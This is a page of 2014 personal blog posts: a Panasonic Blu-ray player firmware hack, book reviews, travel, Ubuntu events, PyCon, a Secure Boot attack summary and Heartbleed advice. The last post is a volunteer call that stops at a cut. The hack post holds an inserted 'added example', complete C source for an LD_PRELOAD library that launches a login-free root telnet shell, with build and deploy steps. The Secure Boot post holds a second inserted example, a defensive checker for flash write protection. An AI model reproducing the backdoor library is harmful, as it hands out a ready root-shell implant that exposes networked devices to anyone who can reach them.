[personal profile] mjg59
I picked up a Panasonic BDT-230 a couple of months ago. Then I discovered that even though it appeared fairly straightforward to make it DVD region free (I have a large pile of PAL region 2 DVDs), the US models refuse to play back PAL content. We live in an era of software-defined functionality. While Panasonic could have designed a separate hardware SKU with a hard block on PAL output, that would seem like unnecessary expense. So, playing with the firmware seemed like a reasonable start.

Panasonic provide a nice download site for firmware updates, so I grabbed the most recent and set to work. Binwalk found a squashfs filesystem, which was a good sign. Less good was the block at the end of the firmware with "RSA" written around it in large letters. The simple approach of hacking the firmware, building a new image and flashing it to the device didn't appear likely to work.

Which left dealing with the installed software. The BDT-230 is based on a Mediatek chipset, and like most (all?) Mediatek systems runs a large binary called "bdpprog" that spawns about eleventy billion threads and does pretty much everything. Running strings over that showed, well, rather a lot, but most promisingly included a reference to "/mnt/sda1/vudu/vudu.sh". Other references to /mnt/sda1 made it pretty clear that it was the mount point for USB mass storage. There were a couple of other constraints that had to be satisfied, but soon attempting to run Vudu was actually setting a blank root password and launching telnetd.

/acfg/config_file_global.txt was the next stop. This is a set of tokens and values with useful looking names like "IDX_GB_PTT_COUNTRYCODE". I tried changing the values, but unfortunately made a poor guess - on next reboot, the player had reset itself to DVD region 5, Blu Ray region C and was talking to me in Russian. More inconveniently, the Vudu icon had vanished and I couldn't launch a shell any more.

But where there's one obvious mechanism for running arbitrary code, there's probably another. /usr/local/bin/browser.sh contained the wonderful line:

    export LD_PRELOAD=/mnt/sda1/bbb/libSegFault.so

so then it was just a matter of building a library that hooked open() and launched inetd, dropping that into the right place, and then opening the browser.
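For the curious, here is what such a preload library looks like. This is an added example, not the code from the post: it shadows open(), and the first time the browser opens anything it double-forks a listener and then passes the call through. The payload (BusyBox telnetd with -l /bin/sh, at /usr/sbin/telnetd) is an assumption about the device's userland; the post only says "inetd". Build it with `gcc -shared -fPIC -o libSegFault.so hook.c`, drop it in bbb/ on a USB stick mounted at /mnt/sda1, and open the browser.

```c
/* Added example: an LD_PRELOAD library of the kind described above.
 * Built as libSegFault.so and placed at /mnt/sda1/bbb/, browser.sh's
 * "export LD_PRELOAD=..." pulls it into the browser process; the first
 * open() that process makes then spawns a telnet listener. Not the
 * author's code; the payload path and arguments are assumed. */
#define _GNU_SOURCE
#undef _FORTIFY_SOURCE        /* fortify's inline open() wrapper would clash with ours */
#include <fcntl.h>
#include <stdarg.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed payload: BusyBox telnetd, -l to hand out /bin/sh without a login
 * prompt (the browser runs as root, so the shell is root too). */
static char *const payload_argv[] = { "/usr/sbin/telnetd", "-l", "/bin/sh", (char *)0 };

static int fired;

/* Returns 1 exactly once per process: the payload is launched on the first
 * hooked call only, every later open() is passed straight through. */
int fire_once(void)
{
    if (fired)
        return 0;
    fired = 1;
    return 1;
}

/* Double-fork so the listener is reparented to init and the browser never
 * sees a child it did not expect (no zombie, no stray SIGCHLD). */
static void spawn_payload(void)
{
    pid_t pid = fork();
    if (pid < 0)
        return;
    if (pid == 0) {
        if (fork() == 0) {
            setsid();
            execv(payload_argv[0], payload_argv);
            _exit(127);            /* exec failed, e.g. no telnetd on this box */
        }
        _exit(0);
    }
    waitpid(pid, (int *)0, 0);     /* reap the intermediate child */
}

/* Our open() shadows libc's. The real work goes straight to the openat
 * syscall, which avoids dlsym(RTLD_NEXT) and therefore any dependence on
 * libdl or on the exact libc the target ships. */
int open(const char *path, int flags, ...)
{
    int mode = 0;
    if (flags & O_CREAT) {
        va_list ap;
        va_start(ap, flags);
        mode = va_arg(ap, int);
        va_end(ap);
    }
    if (fire_once())
        spawn_payload();
    return (int)syscall(SYS_openat, AT_FDCWD, path, flags, mode);
}
```

The one-shot guard matters: a browser opens hundreds of files, and forking a listener on each of them would make the device unusable long before you got a shell.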

This time I set the country code correctly, rebooted and now I can actually watch Monkey Dust again. Hurrah! But, at the same time, concerning. This software has been written without any concern for security, and it listens on the network by default. If it took me this little time to find two entirely independent ways to run arbitrary code on the device, it doesn't seem like a stretch to believe that there are probably other vulnerabilities that can be exploited with less need for physical access.

The depressing part of this is that there's no reason to believe that Panasonic are especially bad here - especially since a large number of vendors are shipping much the same Mediatek code, and so probably have similar (if not identical) issues. The future is made up of network-connected appliances that are using your electricity to mine somebody else's Dogecoin. Our nightmarish dystopia may be stranger than expected.

Review: MaddAddam by Margaret Atwood

Apr. 20th, 2014 02:34 pm
[personal profile] miko
MaddAddam is the third and final novel in Atwood's post-apocalyptic series that started with Oryx and Crake. I read the second one (The Year of the Flood) relatively recently and found it underwhelming, you may recall. I'm happy to say that this one did improve my overall impression of the series, though I suspect that I enjoyed the first novel most.

So, while the first two books were concurrent with different characters, the third starts right after those and continues with both sets of characters surviving together in the decimated world. With one exception (the new information about the genetic spliced creatures), the current-time story (surviving) isn't very notable. Most of the book is actually about one character's history, Zeb, and about another character retelling it to the Crakers. The style is readable, though a bit put on toward the end when one of the Crakers is actually telling the story.

The book went by fast and I liked it well enough, but I wouldn't say it was mindblowing. It did redeem The Year of the Flood a fair bit.
[personal profile] miko
War Maid's Choice is the fourth (and most recent) book in the War God series. Up front, I like this series and recommend it... but since I've already talked about that for three books, take that as the baseline while I complain about a few things.

This book generally follows three character viewpoints: Bazhell, the lead for all of the books and champion of the war god; Leanna, who was a teenager when we last saw her and is now an adult war maid; and the villain of the moment. Like previous books, the villain sections remain a bit of a slog - they're where I most often put the book down, because I obviously don't like the character. It's not my favourite form of exposition.

The relationship between Bazhell and Leanna (you may recall my cringing at it while she was younger) is still incredibly meh. At least it's not really drawn out, but I didn't believe them as a pairing and it reads a bit creepy the same way Sparhawk/Ehlana did (if you're unfamiliar: young girl puts designs on older warrior and eventually "traps" him into marriage as an adult). Not as bad, but... eh.

Overall, the series may have hit its peak already for me. There were too many characters with similar names to try to keep straight, the stakes are getting unreasonably high and the battles unpicturably large. It's pretty clear there's another book planned to follow, and I'll probably read it, but it's getting too high fantasy for me if this is any indication.

Tourist in Montreal

Apr. 20th, 2014 10:11 am
[personal profile] pleia2

A couple weeks ago I was in Montreal for PyCon 2014. It was an amazing conference, but I was also glad to have some time to explore the beautiful city that is Montreal.

On Thursday (2nd day of tutorials) I didn’t have anything scheduled conference-wise, so I met up with my friend and long time Ubuntu contributor John Chiazzese (IdleOne). We’ve worked together online on Ubuntu for several years, and even both lived in the same area at the same time at one point, but we never managed to meet. My love of zoos landed us at the Montreal Biodome, housed in a former Olympic building.

The Biodome takes you through 4 different environments where they have mini-ecosystems for each and animals that populate the zones. The lynx were a big draw for me:

The river otter was also quite adorable and looking for attention. I also quite enjoyed the monkeys! And the penguins!

One of the evenings after the conference I joined a few of my colleagues to see the And Then There Was Light sound and light show at the Notre Dame Basilica, not far from the convention center.

As a fan of historical religious buildings, I was eager for my chance to walk around the basilica as a tourist. The “sound and light show” portion of the show was a bit cheesy, giving folks a history of the French colonists and the basilica itself, but we had fun. Afterwards, we had 15 minutes to walk around and take photos, hooray!

Once they had pulled up the curtains used during the show, the interior did not disappoint. The altar in particular was spectacular:

I was also exposed to a lot of great food in Montreal, only a fraction of which I could eat. I had unfortunately fallen ill just before my trip and was on a strict bland diet – no red meat, no alcohol, no fatty foods. In a city full of steakhouses, wine and cheese this was a special kind of torture, but it did allow me to explore the menus beyond what I might typically order (and I did cheat a bit with the cheese). I ate a lot of chicken, fish and vegetables.

I was fortunate to have decent walking weather during most of the trip, but as the event wound down I found the chilly weather coming back; I even hear that there were some flurries the day after I left. Montreal is great, but it was nice to be on my way back to California when the snow returned!

More photos from my tourist adventures in Montreal here: https://www.flickr.com/photos/pleia2/sets/72157643982902633/

Originally published at pleia2's blog. You can comment here or there.

Recovering....

Apr. 16th, 2014 05:33 pm
[personal profile] badgerbag
Did ok on my trip, but just ok. I also got through work today. And I wrote a blog post because it seemed like it had to be done. But now I'm totally done touching a keyboard. Exhausted, in pain, a bit fevery feeling all over. I have not managed to unpack yet. Moomin helped me put away clean laundry. Zond7 ordered us groceries and cleaned up and we have a helpful house cleaner coming tomorrow. I need serious rest.

Read The Goblin Emperor, which I highly recommend! OMG... more like this!

Also, Pen Pal by Francesca Forrest.

Both excellent!!!

Finding a Tahr (or two!)

Apr. 16th, 2014 03:16 pm
[personal profile] pleia2

Tomorrow the next Ubuntu Long Term Support (LTS) release comes out, 14.04, development code name Trusty Tahr. In preparation, I was putting together some materials for our release event next week and found myself looking for the Tahr artwork when I remembered that it was included in the installer. So now I’ll share it with you as well!

If you go to this source page you will see a “download file” link which will allow you to download a .png of the tahr artwork.


I haven’t found an svg version of this logo, but I’ll be sure to update this post if I do.

Looking for something slightly different? The Xubuntu team also included a tahr in our installer, created by Simon Steinbeiß:


This png has transparency, which makes it show grey on white, but you can flavor it with any color you wish!

You can grab it at this source page where you will see the “download file” link. I’ve also uploaded the svg: art_tahr.svg

Enjoy! And happy release everyone!


[personal profile] beable
So last night I went to sleep thinking about the Giant's Causeway, because trip planning research.

So having gone to sleep on a mythological bent, I ended up with a fair bit of Patricia Wrede's short story about the frying pan of doom bouncing about the dream landscape, which was still the Giant's Causeway (but clearly where it borders the Enchanted Forest).

And then when I woke up my radio alarm was playing the song Call Me Maybe, which I ended up hearing/dreaming as the daleks version of the song as I went back into snooze land.

(I just met you, and this is a crazy! I'm a Dalek, ex-ter-mi-nate!)

- - -

Dreaming about Patricia Wrede's story made me somewhat crave after battle triple chocolate helmet cake, even if mostly I was interviewing kitchen maids who kept being hidden princesses in disguise, but it turned out one of them could really cook so it was ok.

- - -

So one of the tours of the Giant's Causeway is actually the Game of Thrones tour of Northern Ireland. (There is a 1 day option, which is all I'd have time for). I am embarrassed by how tempting that is, and trying to justify it to myself as the "interesting historical scenery with an added geeky bonus" tour.

(no subject)

Apr. 15th, 2014 12:01 am
[personal profile] beable
How Frozen should have ended.
With the best crossover ever:

http://youtu.be/4ThvBNZdGcQ

Real-world Secure Boot attacks

Apr. 13th, 2014 09:43 pm
[personal profile] mjg59
MITRE gave a presentation on UEFI Secure Boot at SyScan earlier this month. You should read the presentation and paper, because it's really very good.

It describes a couple of attacks. The first is that some platforms store their Secure Boot policy in a run time UEFI variable. UEFI variables are split into two broad categories - boot time and run time. Boot time variables can only be accessed while in boot services - the moment the bootloader or kernel calls ExitBootServices(), they're inaccessible. Some vendors chose to leave the variable containing firmware settings available during run time, presumably because it makes it easier to implement tools for modifying firmware settings at the OS level. Unfortunately, some vendors left bits of Secure Boot policy in this space. The naive approach would be to simply disable Secure Boot entirely, but that means that the OS would be able to detect that the system wasn't in a secure state[1]. A more subtle approach is to modify the policy, such that the firmware chooses not to verify the signatures on files stored on fixed media. Drop in a new bootloader and victory is ensured.

But that's not a beautiful approach. It depends on the firmware vendor having made that mistake. What if you could just rewrite arbitrary variables, even if they're only supposed to be accessible in boot services? Variables are all stored in flash, connected to the chipset's SPI controller. Allowing arbitrary access to that from the OS would make it straightforward to modify the variables, even if they're boot time-only. So, thankfully, the SPI controller has some control mechanisms. The first is that any attempt to enable the write-access bit will cause a System Management Interrupt, at which point the CPU should trap into System Management Mode and (if the write attempt isn't authorised) flip it back. The second is to disable access from the OS entirely - all writes have to take place in System Management Mode.

The MITRE results show that around 0.03% of modern machines enable the second option. That's unfortunate, but the first option should still be sufficient[2]. Except the first option relies on the SMI actually firing. And, conveniently, Intel's chipsets have a bit that allows you to disable all SMI sources[3], and then have another bit to disable further writes to the first bit. Except 40% of the machines MITRE tested didn't bother setting that lock bit. So you can just disable SMI generation, remove the write-protect bit on the SPI controller and then write to arbitrary variables, including the SecureBoot enable one.
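The three bits that paragraph is talking about live in two registers of the Intel LPC bridge (PCI device 00:1f.0): BIOSWE, BLE and SMM_BWP in BIOS_CNTL, and SMI_LOCK in GEN_PMCON_1, which is the lock on the "disable all SMIs" bit (GBL_SMI_EN). The following added example, which is not MITRE's tool or code, reads those registers from sysfs and classifies the machine the way the post does. Register offsets and bit positions are those documented for the ICH and the 6/7/8/9-series PCH and are assumed here; newer PCHs moved them, and a proper checker (MITRE's, or chipsec) handles far more cases than this. The values in the test below are constructed.

```c
/* Added example (not MITRE's code): decode BIOS_CNTL and GEN_PMCON_1 from the
 * LPC bridge and say how well BIOS flash writes from the OS are protected.
 * Offsets and bits assumed from the ICH / 6-9 series PCH datasheets. */
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

#define BIOS_CNTL_OFF    0xDC      /* BIOS_CNTL, 8-bit, PCI 00:1f.0 config space */
#define BIOSWE           (1u << 0) /* BIOS Write Enable: flash writes allowed */
#define BLE              (1u << 1) /* BIOS Lock Enable: setting BIOSWE raises an SMI */
#define SMM_BWP          (1u << 5) /* SMM BIOS Write Protect: writes only from SMM */
#define GEN_PMCON_1_OFF  0xA0      /* GEN_PMCON_1, 16-bit, PCI 00:1f.0 config space */
#define SMI_LOCK         (1u << 4) /* locks GBL_SMI_EN, so SMIs cannot be switched off */

enum flash_state {
    FLASH_WRITABLE,        /* no protection: the OS can set BIOSWE and write */
    FLASH_SMI_BYPASSABLE,  /* BLE set but SMI_LOCK clear: clear GBL_SMI_EN, then BIOSWE */
    FLASH_SMI_LOCKED,      /* BLE and SMI_LOCK: safe if the SMI handler flips BIOSWE back */
    FLASH_SMM_ONLY         /* SMM_BWP: writes need every core in SMM, the strong option */
};

/* Order matters: SMM_BWP wins regardless of BIOSWE, an already-set BIOSWE
 * beats BLE (the SMI only fires on the 0->1 transition), and BLE without
 * SMI_LOCK is exactly the 40% case from the paper. */
enum flash_state assess_flash_protection(uint8_t bios_cntl, uint16_t gen_pmcon_1)
{
    if (bios_cntl & SMM_BWP)
        return FLASH_SMM_ONLY;
    if (bios_cntl & BIOSWE)
        return FLASH_WRITABLE;
    if (!(bios_cntl & BLE))
        return FLASH_WRITABLE;
    if (!(gen_pmcon_1 & SMI_LOCK))
        return FLASH_SMI_BYPASSABLE;
    return FLASH_SMI_LOCKED;
}

const char *flash_state_name(enum flash_state s)
{
    switch (s) {
    case FLASH_WRITABLE:       return "flash writable from the OS";
    case FLASH_SMI_BYPASSABLE: return "BLE set but SMI_LOCK clear: SMI can be disabled, then BIOSWE set";
    case FLASH_SMI_LOCKED:     return "BLE set and SMI_LOCK set: relies on the SMI handler";
    case FLASH_SMM_ONLY:       return "SMM_BWP set: writes only from SMM";
    }
    return "unknown";
}

/* Read the live registers through sysfs. Needs root: config space beyond
 * offset 0x40 is not readable by unprivileged users. Returns -1 on failure. */
int read_lpc_registers(const char *cfg_path, uint8_t *bios_cntl, uint16_t *gen_pmcon_1)
{
    int fd = open(cfg_path, O_RDONLY);
    if (fd < 0)
        return -1;
    uint8_t pm[2];
    int ok = pread(fd, bios_cntl, 1, BIOS_CNTL_OFF) == 1 &&
             pread(fd, pm, 2, GEN_PMCON_1_OFF) == 2;
    close(fd);
    if (!ok)
        return -1;
    *gen_pmcon_1 = (uint16_t)(pm[0] | (pm[1] << 8));   /* little-endian */
    return 0;
}

int main(void)
{
    uint8_t bc;
    uint16_t pm;
    if (read_lpc_registers("/sys/bus/pci/devices/0000:00:1f.0/config", &bc, &pm) < 0) {
        perror("reading LPC bridge config space");
        return 1;
    }
    printf("BIOS_CNTL=0x%02x GEN_PMCON_1=0x%04x -> %s\n", bc, pm,
           flash_state_name(assess_flash_protection(bc, pm)));
    return 0;
}
```

Note what the "locked" verdict does not tell you: SMI_LOCK only guarantees that the SMI fires, not that the vendor's SMM handler does something sensible when it does, and neither register says anything about whether the flash descriptor or protected range registers are set. It is a quick triage, not a certificate.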

This is, uh, obviously a problem. The good news is that this has been communicated to firmware and system vendors and it should be fixed in the future. The bad news is that a significant proportion of existing systems can probably have their Secure Boot implementation circumvented. This is pretty unsurprising - I suggested that the first few generations would be broken back in 2012. Security tends to be an iterative process, and changing a branch of the industry that's historically not had to care into one that forms the root of platform trust is a difficult process. As the MITRE paper says, UEFI Secure Boot will be a genuine improvement in security. It's just going to take us a little while to get to the point where the more obvious flaws have been worked out.

[1] Unless the malware was intelligent enough to hook GetVariable, detect a request for SecureBoot and then give a fake answer, but who would do that?
[2] Impressively, basically everyone enables that.
[3] Great for dealing with bugs caused by YOUR ENTIRE COMPUTER BEING INTERRUPTED BY ARBITRARY VENDOR CODE, except unfortunately it also probably disables chunks of thermal management and stops various other things from working as well.

PyCon 2014 wrap-up

Apr. 13th, 2014 05:48 pm
[personal profile] pleia2

As I mentioned in my post about the PiDoorbell workshop, this past week I attended my first PyCon in beautiful (if chilly) Montreal, QC. I did some touristing, but I’ll write about that once I have all my photos up…

But now, the conference!

It was the first conference I’ve attended where I volunteered to help out with the HP booth. I was worried that my role as an engineer on the OpenStack project would leave me completely unprepared to answer questions about HP specifically, but I was instead greeted with kinship among most folks who I spoke with as they could appreciate HP’s investment in open source (and Python). I was also pleased to learn that the guys from the local HP office who came to help out with the booth were also all engineers, focused on either network or printing. Having the actual engineers who helped design the hardware we had on display at the booth was really cool.

Plus, I’m sure it helped that we have a bunch of open Python, OpenStack and other cloud jobs, so plenty of folks were eager to hear about those.

I wasn’t at the booth all weekend; I attended all the keynotes and several talks throughout the event. I think my favorite talks ended up being Track memory leaks in Python by Victor Stinner, Subprocess to FFI: Memory, Performance, and Why You Shouldn’t Shell Out by Christine Spang and In Depth PDB by Nathan Yergler. Upon reflection this makes sense given my work in ops; I’m much more likely to be debugging Python code in my typical day than writing something, so the talks about tracking down problems and performance issues are right up my alley.

The keynotes all three days were great. On Sunday I was particularly struck by the conference gender diversity. In addition to having a reported 1/3 female speakers and attendees, all the leadership in the Python community seem genuinely dedicated to the issue. I’m so used to projects that are still arguing over whether a problem exists let alone taking solid, unapologetic steps to correct the cultural bias. So thank you Python community, for giving us an opportunity to catch up, it’s working!

And finally, since I can’t go anywhere anymore without getting pulled into an OpenStack event, I finally met Dana Bauer from Rackspace this week and she invited me to come help out with a short OpenStack workshop for women on Sunday morning from 10 until noon. The lab they had set up didn’t quite work out, but it gave attendees the opportunity to go in the direction they wanted to. I was able to help a bit here and there, and James E. Blair gave a mini-presentation to a few folks on how to get going with DevStack.

At lunch I was able to meet up with Tatiana Al-Chueyr to chat some about the contribution workflow for OpenStack, which is always a lot of fun for me.

I’m pretty much exhausted from all the socializing, but as always with these conferences it was great to meet up with and chat with friends I haven’t seen in a long time. Thanks to everyone for such a fun week!

Tonight the weather started to turn chilly again, time to head home.


[personal profile] pleia2

The release of Ubuntu 14.04 (Trusty Tahr) LTS is coming up on Thursday, April 17th!

To celebrate, the Ubuntu California team in San Francisco will be hosting an Ubuntu release party at AdRoll! Huge thanks to them for offering us space for this event.


AdRoll is located at 972 Mission Street in San Francisco. It’s within easy walking distance of the Powell Street BART and MUNI stations, which we recommend since parking can be expensive downtown.

Our party will be very casual with free pizza and drinks for attendees. But we do have planned…

  • Mini presentation highlighting Ubuntu 14.04 features
  • Laptops running various flavors of 14.04
  • Tablets and phones running the latest Ubuntu build
  • Ubuntu quiz, with prizes!

So if you’re in the area and would like to join us, please RSVP here:

San Francisco Trusty Release Party

Alternatively you can email me directly at lyz@ubuntu.com and I’ll get you added to the attendee list.


San Francisco isn’t the only active part of the state this release, San Diego is also hosting an event, on April 17th, details here. If you’re near Los Angeles, Nathan Haines is collaborating with the Orange County Linux Users Group (OCLUG) to do an installfest on Saturday May 24th, learn more here.

Not in California? Events are coming together all around the world, check out the LoCo Team Portal to see if there is an event being planned in your area: 14.04 Release Parties.


[personal profile] pleia2

This week I had the opportunity to attend PyCon for the first time. Since beginning to use Python in my systems work so much last year, I’ve had increasing interest in participating in this conference in some capacity, so when the opportunity came around at work to staff the HP booth here in Montreal I was happy to volunteer.

I was also brought to PyCon to be a Teaching Assistant for the Build your own PiDoorbell ! – Learn Home Automation with Python with fellow CodeChix members Rupa Dachere, Akkana Peck, Deepa Karnad Dhurka, Serpil Bayraktar and Stuart Easson.

We spent several weeks preparing for this tutorial. I made the trek down to Palo Alto twice to attend mini-sprints so we could test out the instructions in person prior to the event. We were able to add a number of improvements to both the code and documentation through these events and worked out some of the logistical issues of doing such a hardware event at a conference venue.


Workshop leads and TAs

The actual tutorial was held on Wednesday afternoon. Attendees quickly piled in and we were able to distribute our kits. Somehow we ended up with a few too many registrants but were able to scramble together a few extra pieces to make it work for everyone.

The tutorial was split into several sections, with the tutorial leads (Rupa and Akkana) giving presentations and us TAs going around and helping everyone with their setups when they got stuck. The biggest challenge for most was getting their system to talk to the Raspberry Pi, as we had folks on various operating systems with all kinds of network and USB setups.

Once we got everyone talking to the Pis, it was time for the fun stuff! Akkana gave a great presentation that was a tour of the hardware of the Raspberry Pi, including the setup of the GPIO pins configuration. For more about some cool hardware stuff she’s been doing with the Pi, I highly recommend her blog posts on the topic.

Then we had an led.py script to allow folks to make an LED blink:

As you can see, we’re using solderless breadboards so we didn’t have the complexity of soldering, thank goodness.

Then came the meat of the tutorial, wiring up the distance sensor (and camera if they had one) to actually detect when objects passed and take a photo. I brought along both my Raspberry Pi NoIR Camera Board – Infrared-sensitive Camera and my webcam from my desk at home so attendees could play around with them if they didn’t have ones of their own.

The last step was using Dropbox and Twilio to have a space to upload the photo to and then send out a notification.

Surprisingly for a hardware tutorial with such a diversity of host systems, I’m happy to report that most of the students were able to get the tutorial fully completed – at least to the point of taking pictures, if not the upload and notification portion. It was a lot of work for us TAs as we ran around helping everyone and debugging serial and networking issues, but it was worth it to see how much fun everyone had when they finally got an LED to blink or took their first picture.

All of the slides and source code are freely licensed, but the repository hasn’t been made available yet as Rupa wanted to fix some important bugs first (can’t have people frying their Pis!). But never fear, I’ll be following up to make sure it’s made available as soon as possible so others can do this too!

I’ve uploaded more photos from the event here: https://www.flickr.com/photos/pleia2/sets/72157643750475463/


[personal profile] pleia2

I’ve had a very busy year so far talk-wise. Back in January I gave a handful of sysadmin focused talks at Linux.conf.au in Perth, Western Australia. In February I did similar at the Southern California Linux Expo. In May I’ll be drifting slightly away from a Linux-only crowd to present at LOPSA-East in New Brunswick, New Jersey on May 3rd.

LOPSA-East 2014

First up on the schedule I’ll be doing my Code Review for Sys Admins talk:

I’m a member of the OpenStack Infrastructure team which is a geographically distributed team of systems administrators from several different companies who work together in public to maintain the infrastructure described at http://ci.openstack.org.

To achieve this, we use a code review system that leverages Gerrit as the interface for peer review and Jenkins to run some basic configuration and code syntax checking against our submissions. This allows us to maintain code and config file integrity and gives us a nice platform so that our fellow systems administrators can comment on and improve solutions we come up with. We also use IRC, Etherpad and more for collaboration, which I will discuss.

I love giving this talk and I’m excited to be giving it at a conference focused at sysadmin-type folks in the industry.

But it gets better, they’ve also asked me to keynote on Saturday evening!

I’ve titled my talk Universal Design for Tech: Improving Gender Diversity in our Industry (thanks to Leigh Honeywell for the title idea):

Universal Design is a principle in accessibility that accessible design makes things better for everyone. A key example of which are curb cuts and door openers which help those who are disabled but also folks with luggage and parents with strollers.

Elizabeth will discuss ideas on how to improve gender diversity in our industry, but many of the tips will help everyone beyond improvements that come through diversity. From offering formal education for systems administration to offering flexible schedules and work arrangements, there are many things that can be done to attract much-needed talent.

As someone who has made it in the industry I’m keen on preserving the environment that I’ve grown and thrived in, but also in making small changes that I know would have helped me along the way and will help others, including women.

I also took some time to chat with Tom Limoncelli about my talk, which he’s posted on the Everything Sysadmin blog: Interview with LOPSA-East Keynote: Elizabeth Krumbach Joseph

Registration is still open for the conference and I hear there might even be some space at the hotel left (but it’s filling up fast!). Hope to see you there!


[personal profile] thorfinn
Please Share Around: So, you may or may not have heard about "Heartbleed". A significant proportion[1], possibly 2/3rds of all "secure" web servers out there are currently essentially insecure (could be snooped on by anyone on the Internet), and this may have been the case since Mar 2012. The bug was publicly announced on 7th of April 2014.

Right now, before you log in to any secure website (has the little lock icon), you should go here: http://filippo.io/Heartbleed

and enter the website name without the http or https bit, to check if the service is vulnerable.

If that doesn't work, try: https://lastpass.com/heartbleed (but that reports a lot of false "maybe"s, so it's not as useful).

If that still doesn't work, for an even more full on SSL test, go here: https://www.ssllabs.com/ssltest/index.html

If the service is reported as vulnerable - DO NOT LOG IN. Go and register a support complaint with that website, point them at http://filippo.io/Heartbleed and http://heartbleed.com/ and wait until they fix the problem. If you do log in and use the website, be aware that your login details (and anything else you send to/from that site) can be stolen by anyone on the Internet. Literally. It is that bad a bug.

Problematically, if you use smartphone apps that connect to a secure service at the back end, many of them may well be vulnerable, but you have no way of knowing. If you know what their website is, go test that, as they may be using the same service to provide their website.

Reliable secure service providers are starting to notify their customers of the situation and recommend changing your password.

If you know a service has been vulnerable to this bug, it is very much in your interest to change your password the moment it is fixed. Now is the time to find a password keeper application to randomly generate new unique passwords for every single site you log in to and store them for you. If you're an Apple only person, the iCloud Keychain is quite good (I'm told) and free, otherwise I highly recommend 1Password ( https://agilebits.com/onepassword ). There are other options for secure password keepers, if people who use other good ones wish to mention them in comments, please feel free.

If you have too many sites to check them all, you might want to prioritise. Here's [personal profile] skud on why You don’t need to change all your passwords.

You can take this one very seriously - Bruce Schneier, pretty much the top person regarding computer security, says '"Catastrophic" is the right word. On the scale of 1 to 10, this is an 11.' - https://www.schneier.com/blog/archives/2014/04/heartbleed.html

ETA: A "big sites" hitlist of who you *should* change your passwords with: http://mashable.com/2014/04/09/heartbleed-bug-websites-affected/

[1] ETA: Something like 6-10% of all sites, judging by this scan - Here's a list of 627 sites that were vulnerable on 8th April: https://github.com/musalbas/heartbleed-masstest/blob/b72a87558bfe37cd40327ec8b72386a2a2b99c69/README.md#627-of-the-top-10000-sites-appeared-vulnerable-on-april-8-1600-utc
[personal profile] skud
This is a crosspost from Infotropism. You can comment here or there.

This is probably going to be a wildly unpopular opinion and IDGAF. So many of my non-technical friends are freaking out that I feel the need to provide a bit of reassurance/reality.

First, an analogy.

In 2005 we learned that you can open a Kryptonite U-lock with a ballpoint pen. Everyone freaked out and changed their bike locks ASAP. Remember that?

Now, I wasn’t riding a bike at the time, but I started riding a bike a few years later in San Francisco, and I know how widespread bike theft is there. I used multiple levels of protection for my bike: a good lock, fancy locking posts on the seat and handlebars, and I parked my bike somewhere secure (work, home) about 90% of the time and only locked it up in public for short periods. Everywhere I went I saw sad, dismembered bike frames hanging forlornly from railings, reminding me of the danger. Those were paranoid times, and if I’d been riding in SF in 2005 you can bet I would have been first in line to replace my U-lock.

These days I live in Ballarat, a country town in Victoria, Australia. Few people ride bikes here and even fewer steal them. I happily leave my bike unlocked on friends’ front porches, dump it under a tree while I watch birds on the lake, lean it against the front of a shop just locked to itself while I grab a coffee, or park it outside divey music venues while I attend gigs late at night. I have approximately zero expectation of anything happening to it. If I heard that my bike lock had been compromised, I wouldn’t be in too desperate a hurry to change it.

Here’s the thing: if you are an ordinary Jane or Joe living the Internet equivalent of my cycling life in Ballarat, you don’t need to freak out about this thing.

Here are some websites I use where I’m not going to bother changing my password:

  • The place where I save interesting recipes
  • The one I go to to look at gifs of people in bands
  • That guitar forum
  • The one with the cool jewelry
  • The wiki I edit occasionally
  • The social network I only signed up for out of a sense of obligation but never use

Why? Because a) probably nobody’s going to bother trying to steal the passwords from there, and b) even if they did, so what?

This Heartbleed bug effectively reduces the privacy of an SSL-protected site (one whose URL starts with https://, which will probably show a lock in your browser’s address bar) to that of one without. Would you log in to a site without SSL? Do you even know if the site uses SSL? If you’d log in to your pet/recipe/knitting/music site anyway — if you’d do it from a coffee shop or airport — if you’d do it from a laptop or tablet or phone that doesn’t have a strong password on it — if you don’t use two-factor authentication or don’t know what that means — then basically this won’t matter to you.

(I’m not saying it shouldn’t matter. You should probably set strong passwords and use VPNs and two-factor authentication. Just like you should probably lock your bike up everywhere you go, floss, and get your pap smears on the regular. Right? Right? *crickets*)

So if you’re a regular Jane — not working in IT security, not keeping state secrets, etc — here’s where you really need to change your passwords:

  • Any site you use to login to other sites (e.g. Google, Facebook)
  • Any site that gives access to a good chunk of your money with just your password (e.g. your bank, PayPal, Amazon)

(To do this: use this site to check if the site in question is affected, then if it’s “all clear” change your password. Don’t bother changing your password on a still-affected site, as that defeats the purpose. Oh, and you should probably change your passwords on those sites semi-regularly anyway, like maybe when you change the batteries in your smoke alarm. Which I just realised I should have done the other day and didn’t. Which tells you everything, really.)

Beyond those couple of key websites, you need to do a little risk assessment. Ask yourself questions like:

  • Has anyone ever heard of this site? Does anyone care? Is it likely to be a target of ominous dudes in balaclavas?
  • If I lost my login to this site, or someone could snoop what I had on that account, what is the worst that could happen?

If your answer is “I’d lose my job” or “I absolutely cannot survive without my extensive collection of Bucky/Steve fanart” then by all means change your password.

If your answer is “Eh, I’d sign up for a new one” or “Wait, even I’d forgotten that site existed” then you can probably stop freaking out quite so much.


DISCLAIMER: I am not an Internet security expert, just a moderately well-informed techhead. Some people, including better-informed ones, will disagree with me. You take this advice at your own risk. La la la what the fuck ever, you’ll most likely be fine.

[personal profile] skud
This is a crosspost from Infotropism. You can comment here or there.

As you might know, I’ve been working on 3000 Acres over the last few months. My time there is almost up and they’re looking for volunteers to continue developing the site. If anyone in the Melbourne area is interested in working with me on this, and then taking it over, please get in touch! It would be a great way to get involved in a tech project for sustainability/social good, and the 3000 Acres team are lovely people with a great vision. Feel free to drop me an email or ping me via whatever other means is convenient, and please help us get the word out.


3000 Acres connects people with vacant land to help them start community gardens. In 2013 3000 Acres was the winner of the VicHealth Seed Challenge, and is supported by VicHealth and The Australian Centre for Social Innovation (TACSI) along with a range of partners from the sustainability, horticulture, and urban planning fields. We are in the process of incorporating as a non-profit.

Our website, which is the main way people interact with us, launched in February 2014. The site helps people map vacant lots, connect with other community members, and find community garden resources. Since our launch we have continued to improve and add features to our site.

So far, our web development has been done by one part-time developer. We are looking for another (or multiple) volunteer developers to help us continue to improve the site, and to help make our code ready to roll out to other cities.

We’re looking for someone with the following skills and experience:

